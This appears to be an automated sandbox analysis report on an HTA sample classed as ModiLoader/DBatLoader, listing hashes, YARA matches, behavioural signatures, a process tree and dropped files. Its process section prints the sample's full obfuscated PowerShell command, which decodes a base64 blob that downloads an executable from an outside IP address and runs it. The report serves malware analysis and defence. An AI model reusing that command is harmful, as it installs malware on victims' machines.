Analysis
-
max time kernel
119s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 12:52
Static task
static1
Behavioral task
behavioral1
Sample
creatednew.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
creatednew.hta
Resource
win10v2004-20241007-en
General
-
Target
creatednew.hta
-
Size
154KB
-
MD5
e6ea1b0e973fa8ec748b9579629894b4
-
SHA1
1dd21e28ff3a7ff940ce09b4c02913851a33353c
-
SHA256
87f8242b695b7dd667f9e270c070c195016a3512367f960ecce95154c7fc08e4
-
SHA512
7f644f0c2ef4fdfac5685f6a1cad2ada9fc48bc0ea42b5387a5d904e1c932c9438c3740ae0518907c278456ef172d8d65c8c5a133576d4bcaa333fe93e368def
-
SSDEEP
96:4owZw9d6yfaCqsjL2ZAV6PTgLUkMXHsqDo3qsjL2ZAV6P8gLUkMXHsqDo8mYMnSB:4LwASgFM4t+ywYQ
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral1/memory/624-30-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-34-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-41-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-81-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-79-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-76-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-75-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-73-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-70-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-68-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-65-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-64-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-62-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-61-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-58-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-56-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-54-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-53-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-50-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-48-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-45-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-44-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-43-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-42-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-40-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-78-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-72-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-39-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-67-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-38-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-59-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-37-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-51-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-35-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-114-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-111-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-108-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-106-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-103-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-100-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-97-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-95-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-92-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-89-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-86-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-84-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-80-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-77-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-74-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-71-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-69-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-66-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-63-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-60-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-57-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-55-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-52-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-49-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-47-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-46-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 behavioral1/memory/624-36-0x0000000003390000-0x0000000004390000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2812 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2140 cmd.exe 2812 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 624 winnit.exe -
Loads dropped DLL 5 IoCs
pid Process 2812 powershell.exe 2812 powershell.exe 1900 WerFault.exe 1900 WerFault.exe 1900 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1900 624 WerFault.exe 36 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winnit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2784 wrote to memory of 2140 2784 mshta.exe 30 PID 2784 wrote to memory of 2140 2784 mshta.exe 30 PID 2784 wrote to memory of 2140 2784 mshta.exe 30 PID 2784 wrote to memory of 2140 2784 mshta.exe 30 PID 2140 wrote to memory of 2812 2140 cmd.exe 32 PID 2140 wrote to memory of 2812 2140 cmd.exe 32 PID 2140 wrote to memory of 2812 2140 cmd.exe 32 PID 2140 wrote to memory of 2812 2140 cmd.exe 32 PID 2812 wrote to memory of 536 2812 powershell.exe 33 PID 2812 wrote to memory of 536 2812 powershell.exe 33 PID 2812 wrote to memory of 536 2812 powershell.exe 33 PID 2812 wrote to memory of 536 2812 powershell.exe 33 PID 536 wrote to memory of 2580 536 csc.exe 34 PID 536 wrote to memory of 2580 536 csc.exe 34 PID 536 wrote to memory of 2580 536 csc.exe 34 PID 536 wrote to memory of 2580 536 csc.exe 34 PID 2812 wrote to memory of 624 2812 powershell.exe 36 PID 2812 wrote to memory of 624 2812 powershell.exe 36 PID 2812 wrote to memory of 624 2812 powershell.exe 36 PID 2812 wrote to memory of 624 2812 powershell.exe 36 PID 624 wrote to memory of 1900 624 winnit.exe 38 PID 624 wrote to memory of 1900 624 winnit.exe 38 PID 624 wrote to memory of 1900 624 winnit.exe 38 PID 624 wrote to memory of 1900 624 winnit.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatednew.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOWErshell.EXe -ex BYPasS -nop -W 1 -c DeViCeCReDENtIaLDEPLOymenT.exe ; INVOke-eXpRESSIOn($(InVOke-eXPResSiON('[SYsTem.tExT.eNCODing]'+[chAR]58+[CHaR]0X3A+'uTf8.GetSTRINg([sYSTEm.CONvErT]'+[chAr]0x3a+[ChAR]58+'FroMBAsE64STRiNg('+[cHAR]34+'JHogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVyZEVmaW5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJaUxmb3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMaVRDb253SFl4bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlQUk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS011LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURGVW1qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9MZ0tOTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaSUdPdU9Fa0F6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIxNi4xNTguMjM4LjYxLzEyNi93aW5uaXQuZXhlIiwiJEVOVjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBUnQtc2xlRXAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[ChAr]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWErshell.EXe -ex BYPasS -nop -W 1 -c DeViCeCReDENtIaLDEPLOymenT.exe ; INVOke-eXpRESSIOn($(InVOke-eXPResSiON('[SYsTem.tExT.eNCODing]'+[chAR]58+[CHaR]0X3A+'uTf8.GetSTRINg([sYSTEm.CONvErT]'+[chAr]0x3a+[ChAR]58+'FroMBAsE64STRiNg('+[cHAR]34+'JHogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVyZEVmaW5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJaUxmb3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMaVRDb253SFl4bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlQUk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS011LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURGVW1qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9MZ0tOTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaSUdPdU9Fa0F6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIxNi4xNTguMjM4LjYxLzEyNi93aW5uaXQuZXhlIiwiJEVOVjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBUnQtc2xlRXAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[ChAr]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5t8-8__u.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71E6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC71D6.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2580
-
-
-
C:\Users\Admin\AppData\Roaming\winnit.exe"C:\Users\Admin\AppData\Roaming\winnit.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 6725⤵
- Loads dropped DLL
- Program crash
PID:1900
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53d574dc144095f3e4454349d3ec934a3
SHA163d91f13b27d9543c88a1211bcb42d9b53731133
SHA256b20602ded1d96fa7d6a324530f16af763b3b79a6062cf2e45394ebe9f6a9fd85
SHA5125e4f2c9fecba308ad228d89658b99db1e0e044fa24d6ba21380b6d720109bcd74b0eda8f5c0feeafc67b242f3092a38c0bf2eccb2f4d0febec0fa592935b338f
-
Filesize
7KB
MD5951f9e6358b7a73a4da5c315b45115af
SHA136375a6ef1d08faf38240d403cf368072d4ae15e
SHA256cb30d8a69ad3674cc01438a4c34e2cc26d95db502a0a452c354238e930e8af0d
SHA5127bc37eb6230d0075347dfb7d19921457b4b2e45f7833caa1abe1a47817d6c12479cdb53e670f378823a570bcdd22f0a45c477c7a56363019305af4790201d531
-
Filesize
1KB
MD585e5fc3e250f58b48501b6de053d66ac
SHA1fb39139de064bb923d24c67a74e2e71bde250a9a
SHA2561c22cdbe8d009bac858eb0af7f4afcb6c0083635e27de30e8af2e2d78bc3bc2c
SHA5127c4ff2031cb06e00fb4534d40eea729aebcce8994996e4dfebf3c1ddcedc784d56222381c5d8bdbf81729da7ebd9e9c5c240ee1384f7374993e11e7dd6973402
-
Filesize
1.1MB
MD5cad69031c8878d1b06315be343d99ccf
SHA1f050a162fc3bed8152d05212c8d02088c972d4d4
SHA25686596162c86fdb54936df369e7f5da21967f4e4a37a3798dc6ec390f1d78aee0
SHA51201fe3d0d27750d1939eec22924504ab06008666f350570e1a8855a17a2bdf2af81d802b2648688a1a986bf9a1d0eb763a6663605a8f5aeb1cf890b501acd2fc1
-
Filesize
474B
MD517ed2a09ef8af2f424fe41d48e4977bf
SHA173415d4f005b620f31b555b33a4cf32bc4af19f4
SHA256aa39fbaff125462aabb3e5b4b9e940c3e600fd6a40098fe9d1ad4c7351b19978
SHA512c58d339d2edd5bd65b18402fdf76b17c7c23628d2f462d11d0cb52fa873ab1f04b9ac6e8bc08dad2df70c3a0b45326f1bcadc47e97e60c52e24de11166a7ed1f
-
Filesize
309B
MD52b7658cead425ed91ac58a2b9228e8f6
SHA1be4279315efb31b09717f5bdd4924090062bbd6b
SHA256ecb30044f7fece21519a149a56700c22b031babce0e95ef99852624c0eaa9a71
SHA51271f78a9b52383d5c663c82f272a49044695a9c29a4201b33b25c68f6a5d614cbfbfe1d75b9044429713745972843f09d890882f3ede288ba5ba545a20d168046
-
Filesize
652B
MD5c6b9ecb1c3a98108ea71926c60f3e227
SHA10bdddcc4053518db3fe56f6089ca31714ce9825b
SHA2563bc2d8ca70d05516f2046a0cdbcba85376f64d2f51d394322b42a1644b28752b
SHA512984a50d4ff987a6cf205d8f63f892bd2dd97c8f7964d5d64a717d6da256810113e81b29d40617350b4ea590af48ab34eed65dec8b04fe0c2cb6d8e4c39575d74